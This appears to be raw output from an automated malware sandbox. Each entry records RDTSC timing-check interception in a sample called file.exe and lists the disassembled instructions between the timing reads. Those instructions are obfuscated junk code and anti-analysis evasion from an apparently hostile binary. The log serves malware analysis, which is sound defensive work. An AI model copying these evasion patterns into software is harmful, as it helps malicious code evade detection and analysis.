Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E025C5 second address: E025EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FDE71263CE6h 0x00000011 jl 00007FDE71263CE6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E168A6 second address: E168B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007FDE70D000C6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E168B4 second address: E168B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E168B8 second address: E168D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jns 00007FDE70D000C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDE70D000CEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E168D8 second address: E168E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FDE71263CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E168E8 second address: E16900 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16F7F second address: E16F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16F84 second address: E16F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16F8A second address: E16F9F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDE71263CE6h 0x00000008 jc 00007FDE71263CE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16F9F second address: E16FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDE70D000D4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16FBE second address: E16FCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FDE71263CE6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16FCE second address: E16FD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16FD2 second address: E16FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16FD8 second address: E16FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E172D9 second address: E1731A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF7h 0x00000007 jmp 00007FDE71263CF8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FDE71263CE6h 0x00000016 jo 00007FDE71263CE6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1731A second address: E17320 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A0B0 second address: E1A0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A0B6 second address: E1A0D1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FDE70D000CCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A0D1 second address: E1A0DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FDE71263CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A0DB second address: E1A135 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jnl 00007FDE70D000CEh 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007FDE70D000D6h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 je 00007FDE70D000DEh 0x00000029 jmp 00007FDE70D000D8h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A1A8 second address: E1A1CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007FDE71263CFFh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A1CF second address: E1A21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE70D000D1h 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FDE70D000D0h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edi 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FDE70D000D2h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A21A second address: E1A265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b mov edi, 5D8F740Ch 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 or ecx, dword ptr [ebp+122D2C47h] 0x0000001a push 00000003h 0x0000001c mov dword ptr [ebp+122D2AF9h], edx 0x00000022 call 00007FDE71263CE9h 0x00000027 jnp 00007FDE71263CECh 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 push edx 0x00000034 pop edx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A352 second address: E1A356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A356 second address: E1A366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A366 second address: E1A38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 mov cl, 4Ah 0x00000009 push 00000000h 0x0000000b call 00007FDE70D000C9h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDE70D000D0h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A38C second address: E1A3FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jmp 00007FDE71263CF1h 0x00000010 pop esi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FDE71263CF3h 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007FDE71263CF0h 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 jmp 00007FDE71263CF5h 0x0000002b push eax 0x0000002c push edx 0x0000002d je 00007FDE71263CE6h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A533 second address: E1A537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A537 second address: E1A603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FDE71263CFFh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 call 00007FDE71263CEAh 0x00000015 push ebx 0x00000016 movzx edi, bx 0x00000019 pop ecx 0x0000001a pop esi 0x0000001b push 00000000h 0x0000001d or ecx, dword ptr [ebp+122D1C08h] 0x00000023 push 31B3FA30h 0x00000028 jmp 00007FDE71263CEBh 0x0000002d xor dword ptr [esp], 31B3FAB0h 0x00000034 xor dword ptr [ebp+122D1D20h], eax 0x0000003a pushad 0x0000003b push edi 0x0000003c jmp 00007FDE71263CF5h 0x00000041 pop esi 0x00000042 jmp 00007FDE71263CF3h 0x00000047 popad 0x00000048 push 00000003h 0x0000004a pushad 0x0000004b pushad 0x0000004c mov dword ptr [ebp+122D2195h], edi 0x00000052 mov eax, dword ptr [ebp+122D2C67h] 0x00000058 popad 0x00000059 adc si, 614Eh 0x0000005e popad 0x0000005f push 00000000h 0x00000061 mov dword ptr [ebp+122D1D43h], edx 0x00000067 push 00000003h 0x00000069 mov edi, dword ptr [ebp+122D2D53h] 0x0000006f cld 0x00000070 call 00007FDE71263CE9h 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007FDE71263CEFh 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A603 second address: E1A626 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDE70D000C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FDE70D000CDh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A626 second address: E1A62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A62A second address: E1A641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A641 second address: E1A669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FDE71263CF1h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FDE71263CE8h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A669 second address: E1A6A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a lea ebx, dword ptr [ebp+1245A013h] 0x00000010 and esi, 50E2A92Eh 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDE70D000D9h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0C742 second address: E0C748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E37E4F second address: E37E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E37E53 second address: E37E5C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E37E5C second address: E37E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E37FBD second address: E37FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E37FC1 second address: E37FFA instructions: 0x00000000 rdtsc 0x00000002 js 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 ja 00007FDE70D000C6h 0x00000017 pop edx 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b jnl 00007FDE70D000C6h 0x00000021 jbe 00007FDE70D000C6h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a ja 00007FDE70D000CCh 0x00000030 push edi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E384CA second address: E384D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E384D0 second address: E384D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E384D4 second address: E384DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E384DF second address: E384ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 je 00007FDE70D000C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E384ED second address: E384F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E384F3 second address: E3850C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FDE70D000C6h 0x0000000d jmp 00007FDE70D000CCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3878E second address: E38793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E38793 second address: E3879D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDE70D000CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E38A14 second address: E38A1E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDE71263CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E38B9C second address: E38BB7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FDE70D000D5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E38BB7 second address: E38BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E394A0 second address: E394B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CDh 0x00000007 je 00007FDE70D000CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E395F5 second address: E395FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3E0C5 second address: E3E0E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDE70D000CCh 0x00000008 jo 00007FDE70D000C6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3E0E7 second address: E3E0EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3E0EB second address: E3E0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3E0F1 second address: E3E0F6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3E0F6 second address: E3E108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jng 00007FDE70D000D4h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3E108 second address: E3E120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FDE71263CE6h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007FDE71263CE6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E40F69 second address: E40F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDE70D000CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E40F7F second address: E40F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E45625 second address: E4563B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4563B second address: E45647 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDE71263CEEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8723 second address: DF8727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8727 second address: DF874F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FDE71263CEDh 0x0000000c jmp 00007FDE71263CF2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44BAE second address: E44BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE70D000CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44BC1 second address: E44BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44BC5 second address: E44BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDE70D000C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FDE70D000CBh 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 jmp 00007FDE70D000D7h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44BF9 second address: E44C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44C03 second address: E44C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44C08 second address: E44C0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44D54 second address: E44D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E454D2 second address: E454D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E454D8 second address: E454E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jng 00007FDE70D000C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E454E7 second address: E454ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E48279 second address: E48296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FDE70D000CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4861B second address: E48636 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE71263CF1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E48B3A second address: E48B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E48BB8 second address: E48BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E48C81 second address: E48C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jc 00007FDE70D000C6h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E48F79 second address: E48F7F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E490B1 second address: E490EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007FDE70D000D9h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E490EA second address: E490F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDE71263CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E495C5 second address: E495FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007FDE70D000C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FDE70D000CAh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a cld 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FDE70D000D6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E49ED6 second address: E49F6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FDE71263CE8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 sub dword ptr [ebp+12457D2Ch], ebx 0x0000002d mov dword ptr [ebp+122D20BAh], ecx 0x00000033 push 00000000h 0x00000035 mov esi, edx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007FDE71263CE8h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 mov dword ptr [ebp+122D1CD4h], ecx 0x00000059 xchg eax, ebx 0x0000005a jmp 00007FDE71263CF2h 0x0000005f push eax 0x00000060 pushad 0x00000061 pushad 0x00000062 jmp 00007FDE71263CF4h 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
